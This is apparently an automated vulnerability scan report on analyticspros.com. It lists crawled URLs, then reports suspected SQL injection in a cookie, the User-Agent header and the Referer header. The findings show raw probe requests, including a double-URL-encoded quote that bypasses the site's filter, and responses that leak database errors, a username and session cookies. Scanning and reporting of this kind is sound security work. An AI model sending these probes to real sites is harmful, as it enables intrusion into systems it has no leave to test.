14.18. http://www.analyticspros.com/blog/55-googleanalytics/114-share-advanced-segment-google-analytics.html

14.19. http://www.analyticspros.com/blog/55-googleanalytics/115-analytics-toolbar-for-dma-known-issues.html

14.20. http://www.analyticspros.com/blog/55-googleanalytics/117-campaign-tracking-with-google-analytics-email-banners-and-more.html

14.21. http://www.analyticspros.com/blog/55-googleanalytics/60-ga-extended-segments-part-1.html

14.22. http://www.analyticspros.com/blog/55-googleanalytics/63-kintiskton-llc-in-google-analytics.html

14.23. http://www.analyticspros.com/blog/55-googleanalytics/68-unobfuscate-gajs-file.html

14.24. http://www.analyticspros.com/blog/55-googleanalytics/77-refresh-rate-content-metric.html

14.25. http://www.analyticspros.com/blog/55-googleanalytics/79-google-analytincs-training-emetrics-dc-2009.html

14.26. http://www.analyticspros.com/blog/55-googleanalytics/89-dont-kill-the-messenger.html

14.27. http://www.analyticspros.com/blog/55-googleanalytics/95-more-dimensions-site-search-source-medium.html

14.28. http://www.analyticspros.com/blog/55-googleanalytics/97-workshop-january-29th-dimensionator.html

14.29. http://www.analyticspros.com/blog/55-googleanalytics/99-unique-keywords-by-month.html

14.30. http://www.analyticspros.com/blog/56-seo/

14.31. http://www.analyticspros.com/blog/56-seo/59-search-ranking-position-with-ga.html

14.32. http://www.analyticspros.com/blog/56-seo/78-best-seo-video-matt-cutts-wordpress.html

14.33. http://www.analyticspros.com/blog/62-urchin/118-urchin-7-now-available.html

14.34. http://www.analyticspros.com/blog/62-urchin/75-convert-u5data-error-changing-directories.html

14.35. http://www.analyticspros.com/blog/62-urchin/87-visitor-scoring-with-urchin.html

14.36. http://www.analyticspros.com/blog/62-urchin/94-exclude-bots-in-urchin.html

14.37. http://www.analyticspros.com/blog/googleanalytics/100-google-analytics-training-toronto-emetrics-2010.html

14.38. http://www.analyticspros.com/blog/googleanalytics/101-dimensionator-day-of-week-month-date-analysis.html

14.39. http://www.analyticspros.com/blog/googleanalytics/103-google-analytics-opt-out-feature.html

14.40. http://www.analyticspros.com/blog/googleanalytics/106-google-analytics-health-check.html

14.41. http://www.analyticspros.com/blog/googleanalytics/108-custom-variable-dimensions.html

14.42. http://www.analyticspros.com/blog/googleanalytics/109-google-analytics-training-san-jose-2010.html

14.43. http://www.analyticspros.com/blog/googleanalytics/113-domain-hostname-content-reports.html

14.44. http://www.analyticspros.com/blog/googleanalytics/114-share-advanced-segment-google-analytics.html

14.45. http://www.analyticspros.com/blog/googleanalytics/115-analytics-toolbar-for-dma-known-issues.html

14.46. http://www.analyticspros.com/blog/googleanalytics/117-campaign-tracking-with-google-analytics-email-banners-and-more.html

14.47. http://www.analyticspros.com/blog/googleanalytics/122-traning-workshop-washington-dc-2010.html

14.48. http://www.analyticspros.com/blog/googleanalytics/60-ga-extended-segments-part-1.html

14.49. http://www.analyticspros.com/blog/googleanalytics/63-kintiskton-llc-in-google-analytics.html

14.50. http://www.analyticspros.com/blog/googleanalytics/68-unobfuscate-gajs-file.html

14.51. http://www.analyticspros.com/blog/googleanalytics/77-refresh-rate-content-metric.html

14.52. http://www.analyticspros.com/blog/googleanalytics/79-google-analytincs-training-emetrics-dc-2009.html

14.53. http://www.analyticspros.com/blog/googleanalytics/86-google-analytics-intelligence.html

14.54. http://www.analyticspros.com/blog/googleanalytics/89-dont-kill-the-messenger.html

14.55. http://www.analyticspros.com/blog/googleanalytics/91-google-analytics-cookies-and-domains.html

14.56. http://www.analyticspros.com/blog/googleanalytics/95-more-dimensions-site-search-source-medium.html

14.57. http://www.analyticspros.com/blog/googleanalytics/97-workshop-january-29th-dimensionator.html

14.58. http://www.analyticspros.com/blog/googleanalytics/99-unique-keywords-by-month.html

14.59. http://www.analyticspros.com/blog/googleanalytics/function.mysql-connect

14.60. http://www.analyticspros.com/blog/seo.html

14.61. http://www.analyticspros.com/blog/seo/

14.62. http://www.analyticspros.com/blog/urchin.feed

14.63. http://www.analyticspros.com/blog/urchin.html

14.64. http://www.analyticspros.com/blog/urchin/118-urchin-7-now-available.html

14.65. http://www.analyticspros.com/blog/urchin/121-urchin-7-new-interface-first-look.html

14.66. http://www.analyticspros.com/blog/urchin/94-exclude-bots-in-urchin.html

14.67. http://www.analyticspros.com/blog/webanalytics.feed

14.68. http://www.analyticspros.com/cache/

14.69. http://www.analyticspros.com/component/content/article/62-urchin/

14.70. http://www.analyticspros.com/component/content/article/62-urchin/118-urchin-7-now-available.html

14.71. http://www.analyticspros.com/component/jsetup/

14.72. http://www.analyticspros.com/component/jsetup/comment/

14.73. http://www.analyticspros.com/component/jsetup/comment/add.html

14.74. http://www.analyticspros.com/component/jsetup/comment/function.mysql-connect

14.75. http://www.analyticspros.com/components/

14.76. http://www.analyticspros.com/components/com_chronocontact/

14.77. http://www.analyticspros.com/components/com_chronocontact/themes/default/elements.php

14.78. http://www.analyticspros.com/components/com_chronocontact/themes/default/email.php

14.79. http://www.analyticspros.com/components/com_chronocontact/themes/theme1/elements.php

14.80. http://www.analyticspros.com/components/com_fpss/images/

14.81. http://www.analyticspros.com/components/com_fpss/images/thumbs/

14.82. http://www.analyticspros.com/function.mysql-connect

14.83. http://www.analyticspros.com/images/

14.84. http://www.analyticspros.com/images/stories/

14.85. http://www.analyticspros.com/images/stories/blogimg/

14.86. http://www.analyticspros.com/images/stories/blogimg/thumbnails/

14.87. http://www.analyticspros.com/images/stories/products/

14.88. http://www.analyticspros.com/images/stories/products/healtcheck/

14.89. http://www.analyticspros.com/includes/

14.90. http://www.analyticspros.com/index.php

14.91. http://www.analyticspros.com/joobi/inc/mootools/

14.92. http://www.analyticspros.com/joobi/inc/nicedit/

14.93. http://www.analyticspros.com/joobi/node/library/

14.94. http://www.analyticspros.com/joobi/node/library/js/

14.95. http://www.analyticspros.com/joobi/user/media/

14.96. http://www.analyticspros.com/joobi/user/media/images/

14.97. http://www.analyticspros.com/joobi/user/media/images/captcha/

14.98. http://www.analyticspros.com/joobi/user/themes/node/members/

14.99. http://www.analyticspros.com/joobi/user/themes/node/members/css/

14.100. http://www.analyticspros.com/joobi/user/themes/site/joobi/

14.101. http://www.analyticspros.com/joobi/user/themes/site/joobi/css/

14.102. http://www.analyticspros.com/joobi/user/themes/site/joobi/images/

14.103. http://www.analyticspros.com/joobi/user/themes/site/joobi/images/app/

14.104. http://www.analyticspros.com/joobi/user/themes/site/joobi/images/app/cms/

14.105. http://www.analyticspros.com/joobi/user/themes/site/joobi/images/app/cms/48/

14.106. http://www.analyticspros.com/joobi/user/themes/site/joobi/images/star/

14.107. http://www.analyticspros.com/joobi/user/themes/site/joobi/images/toolbar/

14.108. http://www.analyticspros.com/joobi/user/themes/site/joobi/images/toolbar//

14.109. http://www.analyticspros.com/joobi/user/themes/site/joobi/images/toolbar//16/

14.110. http://www.analyticspros.com/joobi/user/themes/site/joobi/images/toolbar/16/

14.111. http://www.analyticspros.com/joobi/user/themes/site/joobi/images/toolbar/32/

14.112. http://www.analyticspros.com/language/

14.113. http://www.analyticspros.com/libraries/

14.114. http://www.analyticspros.com/media/

14.115. http://www.analyticspros.com/media/system/

14.116. http://www.analyticspros.com/media/system/js/

14.117. http://www.analyticspros.com/modules/

14.118. http://www.analyticspros.com/modules/mod_fpss/helper.php

14.119. http://www.analyticspros.com/modules/mod_fpss/includes/elements/categories.php

14.120. http://www.analyticspros.com/modules/mod_fpss/includes/elements/header.php

14.121. http://www.analyticspros.com/modules/mod_fpss/includes/elements/template.php

14.122. http://www.analyticspros.com/modules/mod_fpss/mod_fpss.php

14.123. http://www.analyticspros.com/modules/mod_fpss/tmpl/Default/css/

14.124. http://www.analyticspros.com/modules/mod_fpss/tmpl/Default/default.php

14.125. http://www.analyticspros.com/modules/mod_fpss/tmpl/FSD/css/

14.126. http://www.analyticspros.com/modules/mod_fpss/tmpl/FSD/default.php

14.127. http://www.analyticspros.com/modules/mod_fpss/tmpl/JJ-Obs/css/

14.128. http://www.analyticspros.com/modules/mod_fpss/tmpl/JJ-Obs/default.php

14.129. http://www.analyticspros.com/modules/mod_fpss/tmpl/JJ-Rasper/css/

14.130. http://www.analyticspros.com/modules/mod_fpss/tmpl/JJ-Rasper/default.php

14.131. http://www.analyticspros.com/modules/mod_fpss/tmpl/Movies/css/

14.132. http://www.analyticspros.com/modules/mod_fpss/tmpl/Movies/default.php

14.133. http://www.analyticspros.com/modules/mod_fpss/tmpl/Sleek/css/

14.134. http://www.analyticspros.com/modules/mod_fpss/tmpl/Sleek/default.php

14.135. http://www.analyticspros.com/modules/mod_fpss/tmpl/TT/css/

14.136. http://www.analyticspros.com/modules/mod_fpss/tmpl/TT/default.php

14.137. http://www.analyticspros.com/modules/mod_fpss/tmpl/Uncut/css/

14.138. http://www.analyticspros.com/modules/mod_fpss/tmpl/Uncut/default.php

14.139. http://www.analyticspros.com/plugins/

14.140. http://www.analyticspros.com/plugins/editors/

14.141. http://www.analyticspros.com/plugins/editors/tinymce/

14.142. http://www.analyticspros.com/plugins/editors/tinymce/jscripts/

14.143. http://www.analyticspros.com/plugins/editors/tinymce/jscripts/tiny_mce/

14.144. http://www.analyticspros.com/plugins/editors/tinymce/jscripts/tiny_mce/plugins/

14.145. http://www.analyticspros.com/plugins/editors/tinymce/jscripts/tiny_mce/plugins/advlink/

14.146. http://www.analyticspros.com/plugins/editors/tinymce/jscripts/tiny_mce/plugins/advlink/css/

14.147. http://www.analyticspros.com/plugins/system/

14.148. http://www.analyticspros.com/plugins/system/pc_includes/ajax.php

14.149. http://www.analyticspros.com/plugins/system/pc_includes/helper.php

14.150. http://www.analyticspros.com/plugins/system/pc_includes/template.php

14.151. http://www.analyticspros.com/products/

14.152. http://www.analyticspros.com/products/63-urchin/

14.153. http://www.analyticspros.com/products/63-urchin/119-urchin-6.html

14.154. http://www.analyticspros.com/products/63-urchin/120-buy-urchin-7-or-upgrade.html

14.155. http://www.analyticspros.com/products/63-urchin/70-urchin.html

14.156. http://www.analyticspros.com/products/63-urchin/85-urchin-hosted.html

14.157. http://www.analyticspros.com/products/64-data-warehouse/84-analytics-data-warehouse.html

14.158. http://www.analyticspros.com/products/65-ae.html

14.159. http://www.analyticspros.com/products/65-ae/110-analytics-engine.html

14.160. http://www.analyticspros.com/products/65-ae/function.mysql-connect

14.161. http://www.analyticspros.com/products/analytics-data-warehouse.html

14.162. http://www.analyticspros.com/products/analytics-engine.html

14.163. http://www.analyticspros.com/resources/123-dimensionator-install.html

14.164. http://www.analyticspros.com/resources/64-campaign-tracker.html

14.165. http://www.analyticspros.com/resources/feeds/34-gaac-blogs.html

14.166. http://www.analyticspros.com/resources/feeds/34-gaac-blogs/

14.167. http://www.analyticspros.com/resources/feeds/34-gaac-blogs/13-portent-interactive-blog.html

14.168. http://www.analyticspros.com/resources/feeds/34-gaac-blogs/14-pure-visibility.html

14.169. http://www.analyticspros.com/resources/feeds/34-gaac-blogs/15-roi-revolution-blog.html

14.170. http://www.analyticspros.com/resources/feeds/34-gaac-blogs/16-vki-studios-blog.html

14.171. http://www.analyticspros.com/resources/feeds/34-gaac-blogs/17-viget-labs-blog.html

14.172. http://www.analyticspros.com/resources/feeds/34-gaac-blogs/9-epik-blog.html

14.173. http://www.analyticspros.com/resources/feeds/34-gaac-blogs/function.mysql-connect

14.174. http://www.analyticspros.com/resources/feeds/35-top-web-analysts.html

14.175. http://www.analyticspros.com/resources/feeds/36-other-ga-blogs.html

14.176. http://www.analyticspros.com/resources/feeds/37-ga-support-forums.html

14.177. http://www.analyticspros.com/resources/function.mysql-connect

14.178. http://www.analyticspros.com/resources/healthcheck.html

14.179. http://www.analyticspros.com/resources/healthcheck/run-healthcheck.html

14.180. http://www.analyticspros.com/templates/

14.181. http://www.analyticspros.com/templates/apros2.0/

14.182. http://www.analyticspros.com/templates/apros2.0/css/

14.183. http://www.analyticspros.com/templates/apros2.0/images/

14.184. http://www.analyticspros.com/templates/apros2.0/styles/

14.185. http://www.analyticspros.com/templates/apros2.0/styles/background/

14.186. http://www.analyticspros.com/templates/apros2.0/styles/background/lighter/

14.187. http://www.analyticspros.com/templates/apros2.0/styles/elements/

14.188. http://www.analyticspros.com/templates/system/

14.189. http://www.analyticspros.com/templates/system/css/

14.190. http://www.analyticspros.com/tmp/

14.191. http://www.analyticspros.com/urchin.html

14.192. http://www.analyticspros.com/urchin/

14.193. http://www.analyticspros.com/urchin/buy.html

14.194. http://www.analyticspros.com/urchin/urchin-6.html

14.195. http://www.analyticspros.com/urchin/urchin-hosting.html

14.196. http://www.analyticspros.com/urchin/urchin.html

15. Content type incorrectly stated

15.1. http://www.analyticspros.com/about/caleb-whitmore.html

15.2. http://www.analyticspros.com/blog/

15.3. http://www.analyticspros.com/blog/55-googleanalytics/

15.4. http://www.analyticspros.com/blog/55-googleanalytics/101-dimensionator-day-of-week-month-date-analysis.html

15.5. http://www.analyticspros.com/blog/55-googleanalytics/103-google-analytics-opt-out-feature.html

15.6. http://www.analyticspros.com/blog/55-googleanalytics/108-custom-variable-dimensions.html

15.7. http://www.analyticspros.com/blog/55-googleanalytics/109-google-analytics-training-san-jose-2010.html

15.8. http://www.analyticspros.com/blog/55-googleanalytics/114-share-advanced-segment-google-analytics.html

15.9. http://www.analyticspros.com/blog/55-googleanalytics/115-analytics-toolbar-for-dma-known-issues.html

15.10. http://www.analyticspros.com/blog/55-googleanalytics/117-campaign-tracking-with-google-analytics-email-banners-and-more.html

15.11. http://www.analyticspros.com/blog/55-googleanalytics/68-unobfuscate-gajs-file.html

15.12. http://www.analyticspros.com/blog/55-googleanalytics/79-google-analytincs-training-emetrics-dc-2009.html

15.13. http://www.analyticspros.com/blog/55-googleanalytics/89-dont-kill-the-messenger.html

15.14. http://www.analyticspros.com/blog/55-googleanalytics/95-more-dimensions-site-search-source-medium.html

15.15. http://www.analyticspros.com/blog/55-googleanalytics/97-workshop-january-29th-dimensionator.html

15.16. http://www.analyticspros.com/blog/55-googleanalytics/99-unique-keywords-by-month.html

15.17. http://www.analyticspros.com/blog/56-seo/

15.18. http://www.analyticspros.com/blog/62-urchin/118-urchin-7-now-available.html

15.19. http://www.analyticspros.com/blog/62-urchin/75-convert-u5data-error-changing-directories.html

15.20. http://www.analyticspros.com/blog/62-urchin/87-visitor-scoring-with-urchin.html

15.21. http://www.analyticspros.com/blog/62-urchin/94-exclude-bots-in-urchin.html

15.22. http://www.analyticspros.com/blog/googleanalytics/100-google-analytics-training-toronto-emetrics-2010.html

15.23. http://www.analyticspros.com/blog/googleanalytics/101-dimensionator-day-of-week-month-date-analysis.html

15.24. http://www.analyticspros.com/blog/googleanalytics/103-google-analytics-opt-out-feature.html

15.25. http://www.analyticspros.com/blog/googleanalytics/106-google-analytics-health-check.html

15.26. http://www.analyticspros.com/blog/googleanalytics/108-custom-variable-dimensions.html

15.27. http://www.analyticspros.com/blog/googleanalytics/109-google-analytics-training-san-jose-2010.html

15.28. http://www.analyticspros.com/blog/googleanalytics/113-domain-hostname-content-reports.html

15.29. http://www.analyticspros.com/blog/googleanalytics/115-analytics-toolbar-for-dma-known-issues.html

15.30. http://www.analyticspros.com/blog/googleanalytics/117-campaign-tracking-with-google-analytics-email-banners-and-more.html

15.31. http://www.analyticspros.com/blog/googleanalytics/122-traning-workshop-washington-dc-2010.html

15.32. http://www.analyticspros.com/blog/googleanalytics/60-ga-extended-segments-part-1.html

15.33. http://www.analyticspros.com/blog/googleanalytics/68-unobfuscate-gajs-file.html

15.34. http://www.analyticspros.com/blog/googleanalytics/77-refresh-rate-content-metric.html

15.35. http://www.analyticspros.com/blog/googleanalytics/79-google-analytincs-training-emetrics-dc-2009.html

15.36. http://www.analyticspros.com/blog/googleanalytics/86-google-analytics-intelligence.html

15.37. http://www.analyticspros.com/blog/googleanalytics/97-workshop-january-29th-dimensionator.html

15.38. http://www.analyticspros.com/blog/googleanalytics/99-unique-keywords-by-month.html

15.39. http://www.analyticspros.com/blog/googleanalytics/function.mysql-connect

15.40. http://www.analyticspros.com/blog/urchin.feed

15.41. http://www.analyticspros.com/blog/urchin/121-urchin-7-new-interface-first-look.html

15.42. http://www.analyticspros.com/blog/urchin/94-exclude-bots-in-urchin.html

15.43. http://www.analyticspros.com/component/content/article/62-urchin/118-urchin-7-now-available.html

15.44. http://www.analyticspros.com/component/jsetup/

15.45. http://www.analyticspros.com/component/jsetup/comment/add.html

15.46. http://www.analyticspros.com/components/com_chronocontact/themes/default/elements.php

15.47. http://www.analyticspros.com/components/com_chronocontact/themes/default/email.php

15.48. http://www.analyticspros.com/components/com_chronocontact/themes/theme1/elements.php

15.49. http://www.analyticspros.com/function.mysql-connect

15.50. http://www.analyticspros.com/modules/mod_fpss/helper.php

15.51. http://www.analyticspros.com/modules/mod_fpss/includes/elements/categories.php

15.52. http://www.analyticspros.com/modules/mod_fpss/includes/elements/header.php

15.53. http://www.analyticspros.com/modules/mod_fpss/includes/elements/template.php

15.54. http://www.analyticspros.com/modules/mod_fpss/mod_fpss.php

15.55. http://www.analyticspros.com/modules/mod_fpss/tmpl/Default/default.php

15.56. http://www.analyticspros.com/modules/mod_fpss/tmpl/FSD/default.php

15.57. http://www.analyticspros.com/modules/mod_fpss/tmpl/JJ-Obs/default.php

15.58. http://www.analyticspros.com/modules/mod_fpss/tmpl/JJ-Rasper/default.php

15.59. http://www.analyticspros.com/modules/mod_fpss/tmpl/Movies/default.php

15.60. http://www.analyticspros.com/modules/mod_fpss/tmpl/Sleek/default.php

15.61. http://www.analyticspros.com/modules/mod_fpss/tmpl/TT/default.php

15.62. http://www.analyticspros.com/modules/mod_fpss/tmpl/Uncut/default.php

15.63. http://www.analyticspros.com/plugins/system/pc_includes/ajax.php

15.64. http://www.analyticspros.com/plugins/system/pc_includes/helper.php

15.65. http://www.analyticspros.com/plugins/system/pc_includes/template.php

15.66. http://www.analyticspros.com/products/

15.67. http://www.analyticspros.com/products/63-urchin/

15.68. http://www.analyticspros.com/products/63-urchin/85-urchin-hosted.html

15.69. http://www.analyticspros.com/products/64-data-warehouse/84-analytics-data-warehouse.html

15.70. http://www.analyticspros.com/products/65-ae.html

15.71. http://www.analyticspros.com/products/65-ae/110-analytics-engine.html

15.72. http://www.analyticspros.com/products/analytics-data-warehouse.html

15.73. http://www.analyticspros.com/products/analytics-engine.html

15.74. http://www.analyticspros.com/resources/123-dimensionator-install.html

15.75. http://www.analyticspros.com/resources/64-campaign-tracker.html

15.76. http://www.analyticspros.com/resources/feeds/34-gaac-blogs.html

15.77. http://www.analyticspros.com/resources/feeds/34-gaac-blogs/14-pure-visibility.html

15.78. http://www.analyticspros.com/resources/feeds/35-top-web-analysts.html

15.79. http://www.analyticspros.com/resources/feeds/36-other-ga-blogs.html

15.80. http://www.analyticspros.com/resources/healthcheck.html

15.81. http://www.analyticspros.com/urchin/

15.82. http://www.analyticspros.com/urchin/buy.html

15.83. http://www.analyticspros.com/urchin/urchin-6.html

15.84. http://www.analyticspros.com/urchin/urchin.html



1. SQL injection  next
There are 283 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Remediation background

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://www.analyticspros.com/ [ki_t cookie]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /

Issue detail

The ki_t cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ki_t cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the ki_t cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET / HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.bing.com/search?q=www.analyticspros.com&src=IE-SearchBox&Form=IE8SRC
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11%2527; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 03:52:24 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET / HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.bing.com/search?q=www.analyticspros.com&src=IE-SearchBox&Form=IE8SRC
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11%2527%2527; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 03:52:26 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 03:52:27 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 03:52:27 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 30611


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.2. http://www.analyticspros.com/about/ [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /about/

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /about/ HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)'
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:37:55 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /about/ HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)''
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:37:56 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.3. http://www.analyticspros.com/administrator/ [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /administrator/

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /administrator/ HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%2527
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 05:09:13 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /administrator/ HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%2527%2527
